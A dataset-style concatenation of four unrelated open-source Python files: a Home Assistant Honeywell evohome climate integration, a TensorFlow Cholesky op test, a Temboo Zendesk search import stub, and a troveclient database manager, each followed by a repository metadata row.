    EVO_FOLLOW: STATE_AUTO,
    EVO_TEMPOVER: STATE_MANUAL,
    EVO_PERMOVER: STATE_MANUAL
}
# Reverse mapping: the HA states a user can set on a Zone.
HA_STATE_TO_ZONE = {
    STATE_AUTO: EVO_FOLLOW,
    STATE_MANUAL: EVO_PERMOVER
}
ZONE_OP_LIST = list(HA_STATE_TO_ZONE)
async def async_setup_platform(hass, hass_config, async_add_entities,
                               discovery_info=None):
    """Create the evohome Controller, and its Zones, if any."""
    evo_data = hass.data[DATA_EVOHOME]
    client = evo_data['client']
    loc_idx = evo_data['params'][CONF_LOCATION_IDX]
    # evohomeclient has exposed no means of accessing non-default location
    # (i.e. loc_idx > 0) other than using a protected member, such as below
    tcs_obj_ref = client.locations[loc_idx]._gateways[0]._control_systems[0]  # noqa: E501; pylint: disable=protected-access
    _LOGGER.debug(
        "Found Controller, id=%s [%s], name=%s (location_idx=%s)",
        tcs_obj_ref.systemId, tcs_obj_ref.modelType, tcs_obj_ref.location.name,
        loc_idx)
    controller = EvoController(evo_data, client, tcs_obj_ref)
    zones = []
    for zone_idx in tcs_obj_ref.zones:
        zone_obj_ref = tcs_obj_ref.zones[zone_idx]
        _LOGGER.debug(
            "Found Zone, id=%s [%s], name=%s",
            zone_obj_ref.zoneId, zone_obj_ref.zone_type, zone_obj_ref.name)
        zones.append(EvoZone(evo_data, client, zone_obj_ref))
    # One entity per zone, plus the controller itself.
    entities = [controller] + zones
    async_add_entities(entities, update_before_add=False)
class EvoClimateDevice(ClimateDevice):
    """Base for a Honeywell evohome Climate device."""
    # pylint: disable=no-member
    def __init__(self, evo_data, client, obj_ref):
        """Initialize the evohome entity."""
        self._client = client
        self._obj = obj_ref
        self._params = evo_data['params']
        self._timers = evo_data['timers']
        self._status = {}
        self._available = False  # should become True after first update()
    async def async_added_to_hass(self):
        """Run when entity about to be added."""
        async_dispatcher_connect(self.hass, DISPATCHER_EVOHOME, self._connect)
    @callback
    def _connect(self, packet):
        # Refresh this entity's state if the dispatcher packet addresses its
        # type (parent/child bitmask) and asks for a refresh.
        if packet['to'] & self._type and packet['signal'] == 'refresh':
            self.async_schedule_update_ha_state(force_refresh=True)
    def _handle_exception(self, err):
        # Re-raise *err* so the specific except clauses below can classify it;
        # the local import is only needed for its exception class.
        try:
            import evohomeclient2
            raise err
        except evohomeclient2.AuthenticationError:
            _LOGGER.error(
                "Failed to (re)authenticate with the vendor's server. "
                "This may be a temporary error. Message is: %s",
                err
            )
        except requests.exceptions.ConnectionError:
            # this appears to be common with Honeywell's servers
            _LOGGER.warning(
                "Unable to connect with the vendor's server. "
                "Check your network and the vendor's status page."
            )
        except requests.exceptions.HTTPError:
            if err.response.status_code == HTTP_SERVICE_UNAVAILABLE:
                _LOGGER.warning(
                    "Vendor says their server is currently unavailable. "
                    "This may be temporary; check the vendor's status page."
                )
            elif err.response.status_code == HTTP_TOO_MANY_REQUESTS:
                _LOGGER.warning(
                    "The vendor's API rate limit has been exceeded. "
                    "So will cease polling, and will resume after %s seconds.",
                    (self._params[CONF_SCAN_INTERVAL] * 3).total_seconds()
                )
                # Back off: push the next poll out to three scan intervals.
                self._timers['statusUpdated'] = datetime.now() + \
                    self._params[CONF_SCAN_INTERVAL] * 3
            else:
                raise  # we don't expect/handle any other HTTPErrors
    @property
    def name(self) -> str:
        """Return the name to use in the frontend UI."""
        return self._name
    @property
    def icon(self):
        """Return the icon to use in the frontend UI."""
        return self._icon
    @property
    def device_state_attributes(self):
        """Return the device state attributes of the evohome Climate device.
        This is state data that is not available otherwise, due to the
        restrictions placed upon ClimateDevice properties, etc. by HA.
        """
        return {'status': self._status}
    @property
    def available(self) -> bool:
        """Return True if the device is currently available."""
        return self._available
    @property
    def supported_features(self):
        """Get the list of supported features of the device."""
        return self._supported_features
    @property
    def operation_list(self):
        """Return the list of available operations."""
        return self._operation_list
    @property
    def temperature_unit(self):
        """Return the temperature unit to use in the frontend UI."""
        return TEMP_CELSIUS
    @property
    def precision(self):
        """Return the temperature precision to use in the frontend UI."""
        return PRECISION_HALVES
class EvoZone(EvoClimateDevice):
    """Base for a Honeywell evohome Zone device."""
    def __init__(self, evo_data, client, obj_ref):
        """Initialize the evohome Zone."""
        super().__init__(evo_data, client, obj_ref)
        self._id = obj_ref.zoneId
        self._name = obj_ref.name
        self._icon = "mdi:radiator"
        self._type = EVO_CHILD
        # Find this zone's static config within the location's config blob.
        for _zone in evo_data['config'][GWS][0][TCS][0]['zones']:
            if _zone['zoneId'] == self._id:
                self._config = _zone
                break
        self._status = {}
        self._operation_list = ZONE_OP_LIST
        self._supported_features = \
            SUPPORT_OPERATION_MODE | \
            SUPPORT_TARGET_TEMPERATURE | \
            SUPPORT_ON_OFF
    @property
    def min_temp(self):
        """Return the minimum target temperature of a evohome Zone.
        The default is 5 (in Celsius), but it is configurable within 5-35.
        """
        return self._config['setpointCapabilities']['minHeatSetpoint']
    @property
    def max_temp(self):
        """Return the maximum target temperature of a evohome Zone.
        The default is 35 (in Celsius), but it is configurable within 5-35.
        """
        return self._config['setpointCapabilities']['maxHeatSetpoint']
    @property
    def target_temperature(self):
        """Return the target temperature of the evohome Zone."""
        return self._status['setpointStatus']['targetHeatTemperature']
    @property
    def current_temperature(self):
        """Return the current temperature of the evohome Zone."""
        return (self._status['temperatureStatus']['temperature']
                if self._status['temperatureStatus']['isAvailable'] else None)
    @property
    def current_operation(self):
        """Return the current operating mode of the evohome Zone.
        The evohome Zones that are in 'FollowSchedule' mode inherit their
        actual operating mode from the Controller.
        """
        evo_data = self.hass.data[DATA_EVOHOME]
        system_mode = evo_data['status']['systemModeStatus']['mode']
        setpoint_mode = self._status['setpointStatus']['setpointMode']
        if setpoint_mode == EVO_FOLLOW:
            # then inherit state from the controller
            if system_mode == EVO_RESET:
                current_operation = TCS_STATE_TO_HA.get(EVO_AUTO)
            else:
                current_operation = TCS_STATE_TO_HA.get(system_mode)
        else:
            current_operation = ZONE_STATE_TO_HA.get(setpoint_mode)
        return current_operation
    @property
    def is_on(self) -> bool:
        """Return True if the evohome Zone is on.
        A Zone is considered off if its target temp is set to its minimum, and
        it is not following its schedule (i.e. it is in 'PermanentOverride'
        mode); otherwise it is on.
        """
        is_off = \
            self.target_temperature == self.min_temp and \
            self._status['setpointStatus']['setpointMode'] == EVO_PERMOVER
        return not is_off
    def _set_temperature(self, temperature, until=None):
        """Set the new target temperature of a Zone.
        temperature is required, until can be:
        - strftime('%Y-%m-%dT%H:%M:%SZ') for TemporaryOverride, or
        - None for PermanentOverride (i.e. indefinitely)
        """
        try:
            import evohomeclient2
            self._obj.set_temperature(temperature, until)
        except (requests.exceptions.RequestException,
                evohomeclient2.AuthenticationError) as err:
            self._handle_exception(err)
    def set_temperature(self, **kwargs):
        """Set new target temperature, indefinitely."""
        self._set_temperature(kwargs['temperature'], until=None)
    def turn_on(self):
        """Turn the evohome Zone on.
        This is achieved by setting the Zone to its 'FollowSchedule' mode.
        """
        self._set_operation_mode(EVO_FOLLOW)
    def turn_off(self):
        """Turn the evohome Zone off.
        This is achieved by setting the Zone to its minimum temperature,
        indefinitely (i.e. 'PermanentOverride' mode).
        """
        self._set_temperature(self.min_temp, until=None)
    def set_operation_mode(self, operation_mode):
        """Set an operating mode for a Zone.
        Currently limited to 'Auto' & 'Manual'. If 'Off' is needed, it can be
        enabled via turn_off method.
        NB: evohome Zones do not have an operating mode as understood by HA.
        Instead they usually 'inherit' an operating mode from their controller.
        More correctly, these Zones are in a follow mode, 'FollowSchedule',
        where their setpoint temperatures are a function of their schedule, and
        the Controller's operating_mode, e.g. Economy mode is their scheduled
        setpoint less (usually) 3C.
        Thus, you cannot set a Zone to Away mode, but the location (i.e. the
        Controller) is set to Away and each Zones's setpoints are adjusted
        accordingly to some lower temperature.
        However, Zones can override these setpoints, either for a specified
        period of time, 'TemporaryOverride', after which they will revert back
        to 'FollowSchedule' mode, or indefinitely, 'PermanentOverride'.
        """
        self._set_operation_mode(HA_STATE_TO_ZONE.get(operation_mode))
    def _set_operation_mode(self, operation_mode):
        # Translate the evohome zone mode into the appropriate client call.
        if operation_mode == EVO_FOLLOW:
            try:
                import evohomeclient2
                self._obj.cancel_temp_override()
            except (requests.exceptions.RequestException,
                    evohomeclient2.AuthenticationError) as err:
                self._handle_exception(err)
        elif operation_mode == EVO_TEMPOVER:
            _LOGGER.error(
                "_set_operation_mode(op_mode=%s): mode not yet implemented",
                operation_mode
            )
        elif operation_mode == EVO_PERMOVER:
            # Re-assert the current target temperature as a permanent override.
            self._set_temperature(self.target_temperature, until=None)
        else:
            _LOGGER.error(
                "_set_operation_mode(op_mode=%s): mode not valid",
                operation_mode
            )
    @property
    def should_poll(self) -> bool:
        """Return False as evohome child devices should never be polled.
        The evohome Controller will inform its children when to update().
        """
        return False
    def update(self):
        """Process the evohome Zone's state data."""
        evo_data = self.hass.data[DATA_EVOHOME]
        # Pick this zone's slice out of the location-wide status blob.
        for _zone in evo_data['status']['zones']:
            if _zone['zoneId'] == self._id:
                self._status = _zone
                break
        self._available = True
class EvoController(EvoClimateDevice):
    """Base for a Honeywell evohome hub/Controller device.
    The Controller (aka TCS, temperature control system) is the parent of all
    the child (CH/DHW) devices. It is also a Climate device.
    """
    def __init__(self, evo_data, client, obj_ref):
        """Initialize the evohome Controller (hub)."""
        super().__init__(evo_data, client, obj_ref)
        self._id = obj_ref.systemId
        self._name = '_{}'.format(obj_ref.location.name)
        self._icon = "mdi:thermostat"
        self._type = EVO_PARENT
        self._config = evo_data['config'][GWS][0][TCS][0]
        self._status = evo_data['status']
        # datetime.min forces a status fetch on the first update() call.
        self._timers['statusUpdated'] = datetime.min
        self._operation_list = TCS_OP_LIST
        self._supported_features = \
            SUPPORT_OPERATION_MODE | \
            SUPPORT_AWAY_MODE
    @property
    def device_state_attributes(self):
        """Return the device state attributes of the evohome Controller.
        This is state data that is not available otherwise, due to the
        restrictions placed upon ClimateDevice properties, etc. by HA.
        """
        # The zones/dhw entries are exposed by the child entities instead.
        status = dict(self._status)
        if 'zones' in status:
            del status['zones']
        if 'dhw' in status:
            del status['dhw']
        return {'status': status}
    @property
    def current_operation(self):
        """Return the current operating mode of the evohome Controller."""
        return TCS_STATE_TO_HA.get(self._status['systemModeStatus']['mode'])
    @property
    def min_temp(self):
        """Return the minimum target temperature of a evohome Controller.
        Although evohome Controllers do not have a minimum target temp, one is
        expected by the HA schema; the default for an evohome HR92 is used.
        """
        return 5
    @property
    def max_temp(self):
        """Return the maximum target temperature of a evohome Controller.
        Although evohome Controllers do not have a maximum target temp, one is
        expected by the HA schema; the default for an evohome HR92 is used.
        """
        return 35
    @property
    def target_temperature(self):
        """Return the average target temperature of the Heating/DHW zones.
        Although evohome Controllers do not have a target temp, one is
        expected by the HA schema.
        """
        temps = [zone['setpointStatus']['targetHeatTemperature']
                 for zone in self._status['zones']]
        avg_temp = round(sum(temps) / len(temps), 1) if temps else None
        return avg_temp
    @property
    def current_temperature(self):
        """Return the average current temperature of the Heating/DHW zones.
        Although evohome Controllers do not have a current temp, one is
        expected by the HA schema.
        """
        # Only zones reporting an available temperature are averaged.
        tmp_list = [x for x in self._status['zones']
                    if x['temperatureStatus']['isAvailable'] is True]
        temps = [zone['temperatureStatus']['temperature'] for zone in tmp_list]
        avg_temp = round(sum(temps) / len(temps), 1) if temps else None
        return avg_temp
    @property
    def is_on(self) -> bool:
        """Return True as evohome Controllers are always on.
        For example, evohome Controllers have a 'HeatingOff' mode, but even
        then the DHW would remain on.
        """
        return True
    @property
    def is_away_mode_on(self) -> bool:
        """Return True if away mode is on."""
        return self._status['systemModeStatus']['mode'] == EVO_AWAY
    def turn_away_mode_on(self):
        """Turn away mode on.
        The evohome Controller will not remember its previous operating mode.
        """
        self._set_operation_mode(EVO_AWAY)
    def turn_away_mode_off(self):
        """Turn away mode off.
        The evohome Controller can not recall its previous operating mode (as
        intimated by the HA schema), so this method is achieved by setting the
        Controller's mode back to Auto.
        """
        self._set_operation_mode(EVO_AUTO)
    def _set_operation_mode(self, operation_mode):
        # The client exposes no public setter, hence the protected call.
        try:
            import evohomeclient2
            self._obj._set_status(operation_mode)  # noqa: E501; pylint: disable=protected-access
        except (requests.exceptions.RequestException,
                evohomeclient2.AuthenticationError) as err:
            self._handle_exception(err)
    def set_operation_mode(self, operation_mode):
        """Set new target operation mode for the TCS.
        Currently limited to 'Auto', 'AutoWithEco' & 'HeatingOff'. If 'Away'
        mode is needed, it can be enabled via turn_away_mode_on method.
        """
        self._set_operation_mode(HA_STATE_TO_TCS.get(operation_mode))
    @property
    def should_poll(self) -> bool:
        """Return True as the evohome Controller should always be polled."""
        return True
    def update(self):
        """Get the latest state data of the entire evohome Location.
        This includes state data for the Controller and all its child devices,
        such as the operating mode of the Controller and the current temp of
        its children (e.g. Zones, DHW controller).
        """
        # should the latest evohome state data be retrieved this cycle?
        # (the fetch is allowed to run up to 55 seconds ahead of schedule)
        timeout = datetime.now() + timedelta(seconds=55)
        expired = timeout > self._timers['statusUpdated'] + \
            self._params[CONF_SCAN_INTERVAL]
        if not expired:
            return
        # Retrieve the latest state data via the client API
        loc_idx = self._params[CONF_LOCATION_IDX]
        try:
            import evohomeclient2
            self._status.update(
                self._client.locations[loc_idx].status()[GWS][0][TCS][0])
        except (requests.exceptions.RequestException,
                evohomeclient2.AuthenticationError) as err:
            self._handle_exception(err)
        else:
            self._timers['statusUpdated'] = datetime.now()
            self._available = True
            _LOGGER.debug("Status = %s", self._status)
            # inform the child devices that state data has been updated
            pkt = {'sender': 'controller', 'signal': 'refresh', 'to': EVO_CHILD}
            dispatcher_send(self.hass, DISPATCHER_EVOHOME, pkt)
| jnewland/home-assistant | homeassistant/components/evohome/climate.py | Python | apache-2.0 | 20,045 |
"""Tests for tensorflow.ops.tf.Cholesky."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class CholeskyOpTest(tf.test.TestCase):
  def _verifyCholesky(self, x):
    """Check tf's Cholesky of *x*: LL^T reconstructs x, the factor keeps x's
    shape, and each factor is lower triangular with a positive diagonal."""
    with self.test_session() as sess:
      # Verify that LL^T == x.
      if x.ndim == 2:
        chol = tf.cholesky(x)
        verification = tf.matmul(chol,
                                 chol,
                                 transpose_a=False,
                                 transpose_b=True)
      else:
        # Rank > 2: use the batched variants.
        chol = tf.batch_cholesky(x)
        verification = tf.batch_matmul(chol, chol, adj_x=False, adj_y=True)
      chol_np, verification_np = sess.run([chol, verification])
      self.assertAllClose(x, verification_np)
      self.assertShapeEqual(x, chol)
      # Check that the cholesky is lower triangular, and has positive diagonal
      # elements.
      if chol_np.shape[-1] > 0:
        chol_reshaped = np.reshape(chol_np, (-1, chol_np.shape[-2],
                                             chol_np.shape[-1]))
        for chol_matrix in chol_reshaped:
          self.assertAllClose(chol_matrix, np.tril(chol_matrix))
          self.assertTrue((np.diag(chol_matrix) > 0.0).all())
  def testBasic(self):
    self._verifyCholesky(np.array([[4., -1., 2.], [-1., 6., 0], [2., 0., 5.]]))
  def testBatch(self):
    simple_array = np.array([[[1., 0.], [0., 5.]]])  # shape (1, 2, 2)
    self._verifyCholesky(simple_array)
    self._verifyCholesky(np.vstack((simple_array, simple_array)))
    odd_sized_array = np.array([[[4., -1., 2.], [-1., 6., 0], [2., 0., 5.]]])
    self._verifyCholesky(np.vstack((odd_sized_array, odd_sized_array)))
    # Generate random positive-definite matrices.
    matrices = np.random.rand(10, 5, 5)
    for i in xrange(10):
      # M^T M is symmetric positive (semi-)definite for random M.
      matrices[i] = np.dot(matrices[i].T, matrices[i])
    self._verifyCholesky(matrices)
  def testNonSquareMatrix(self):
    with self.assertRaises(ValueError):
      tf.cholesky(np.array([[1., 2., 3.], [3., 4., 5.]]))
  def testWrongDimensions(self):
    # A rank-1 tensor is not a matrix, so cholesky must reject it.
    tensor3 = tf.constant([1., 2.])
    with self.assertRaises(ValueError):
      tf.cholesky(tensor3)
  def testNotInvertible(self):
    # The input should be invertible.
    with self.test_session():
      with self.assertRaisesOpError("LLT decomposition was not successful. The "
                                    "input might not be valid."):
        # All rows of the matrix below add to zero
        self._verifyCholesky(np.array([[1., -1., 0.], [-1., 1., -1.], [0., -1.,
                                       1.]]))
  def testEmpty(self):
    # Degenerate shapes: zero matrices and zero-sized matrices.
    self._verifyCholesky(np.empty([0, 2, 2]))
    self._verifyCholesky(np.empty([2, 0, 0]))
self._verifyCholesky(np.empty([2, 0, 0]))
if __name__ == "__main__":
  # Run the test suite when executed directly.
  tf.test.main()
| arunhotra/tensorflow | tensorflow/python/kernel_tests/cholesky_op_test.py | Python | apache-2.0 | 2,904 |
from temboo.Library.Zendesk.Search.SearchAll import SearchAll, SearchAllInputSet, SearchAllResultSet, SearchAllChoreographyExecution
from temboo.Library.Zendesk.Search.SearchAnonymous import SearchAnonymous, SearchAnonymousInputSet, SearchAnonymousResultSet, SearchAnonymousChoreographyExecution
| jordanemedlock/psychtruths | temboo/core/Library/Zendesk/Search/__init__.py | Python | apache-2.0 | 296 |
from troveclient import base
from troveclient.common import check_for_exceptions
from troveclient.common import limit_url
from troveclient.common import Paginated
import urlparse
class Database(base.Resource):
    """
    Client-side representation of a single database hosted on a Trove
    instance.

    Attributes (e.g. ``name``) are populated from the API response dict
    by :class:`base.Resource`.
    """
    def __repr__(self):
        # ``self.name`` comes from the API response via base.Resource.
        return "<Database: %s>" % self.name
class Databases(base.ManagerWithFind):
    """
    Manage :class:`Database` resources on Trove instances.
    """
    resource_class = Database

    def create(self, instance_id, databases):
        """
        Create new databases within the specified instance.

        :param instance_id: ID of the instance that will own the databases.
        :param databases: list of dicts describing the databases to create.
        """
        body = {"databases": databases}
        url = "/instances/%s/databases" % instance_id
        resp, body = self.api.client.post(url, body=body)
        check_for_exceptions(resp, body)

    def delete(self, instance_id, dbname):
        """Delete an existing database in the specified instance."""
        url = "/instances/%s/databases/%s" % (instance_id, dbname)
        resp, body = self.api.client.delete(url)
        check_for_exceptions(resp, body)

    def _list(self, url, response_key, limit=None, marker=None):
        """
        GET one page of a collection and wrap it in a :class:`Paginated`.

        :param url: collection URL (pagination parameters are appended).
        :param response_key: key under which the resource list appears in
            the response body.
        :raises Exception: if the call returned no body at all.
        """
        resp, body = self.api.client.get(limit_url(url, limit, marker))
        check_for_exceptions(resp, body)
        if not body:
            raise Exception("Call to " + url +
                            " did not return a body.")
        links = body.get('links', [])
        next_links = [link['href'] for link in links if link['rel'] == 'next']
        # If the server advertised a 'next' page, pull the marker out of
        # its URL so callers can resume pagination. Normally there is at
        # most one 'next' link; if several are present the last one wins.
        next_marker = None
        for link in next_links:
            parsed_url = urlparse.urlparse(link)
            query_dict = dict(urlparse.parse_qsl(parsed_url.query))
            next_marker = query_dict.get('marker', None)
        databases = body[response_key]
        databases = [self.resource_class(self, res) for res in databases]
        return Paginated(databases, next_marker=next_marker, links=links)

    def list(self, instance, limit=None, marker=None):
        """
        Get a page of Databases belonging to the instance.

        :param instance: an instance object (or its ID).
        :rtype: :class:`Paginated` of :class:`Database`.
        """
        return self._list("/instances/%s/databases" % base.getid(instance),
                          "databases", limit, marker)
| cp16net/python-troveclient | troveclient/v1/databases.py | Python | apache-2.0 | 2,840 |